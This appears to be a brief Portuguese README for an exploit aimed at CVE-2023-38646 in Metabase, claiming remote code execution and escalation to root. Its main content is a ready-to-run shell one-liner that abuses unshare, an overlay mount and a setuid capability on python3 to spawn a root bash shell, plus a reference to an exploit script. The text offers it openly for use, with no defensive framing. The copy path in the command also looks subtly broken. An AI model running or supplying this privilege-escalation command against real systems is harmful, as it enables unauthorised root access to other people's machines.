
Exploit para CVE-2023-38646 no Metabase, alcançando execução remota de código e escalonamento de privilégios para root por meio de técnicas unshare e setuid.
Para obter o usuário root da máquina ou sistema de acordo com as informações acima, este comando e arquivo permitirão acessar o usuário root.
Você pode executar este comando diretamente ou executá-lo como arquivo. Comando: $unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p3 l/; setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/;" && u/python3 -c 'import os;import pty;os.setuid(0);pty.spawn("/bin/bash")'
Arquivo executado: $./exploitsh.sh
Eba!